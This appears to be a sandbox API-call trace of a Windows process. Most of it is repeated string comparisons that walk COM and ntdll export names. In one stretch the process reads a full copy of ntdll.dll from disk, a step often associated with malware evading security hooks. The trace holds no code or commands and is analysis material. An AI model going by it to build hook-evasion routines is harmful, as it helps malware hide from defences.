[0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0117.420] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0117.420] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.421] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0117.422] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0117.422] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0117.423] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.423] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0117.424] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0117.425] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0117.425] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0117.426] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0117.442] GetProcessHeap () returned 0x460000 [0117.442] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4076040 | out: hHeap=0x460000) returned 1 [0117.448] GetProcessHeap () returned 0x460000 [0117.448] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x4791b0 [0117.448] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0117.448] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0117.448] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0117.448] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0117.448] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0117.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0117.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0117.449] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0117.449] GetProcessHeap () returned 0x460000 [0117.449] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1bba48) returned 0x4073040 [0117.677] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0117.677] ReadFile (in: hFile=0x140, lpBuffer=0x4073040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4073040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0117.701] CloseHandle (hObject=0x140) returned 1 [0117.701] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0117.701] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0117.701] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0117.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0117.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0117.701] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0117.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0117.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0117.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0117.701] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0117.702] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0117.702] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0117.702] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0117.702] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.702] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0117.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0117.702] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.703] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0117.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0117.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0117.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0117.703] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.704] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0117.704] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0117.704] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0117.704] 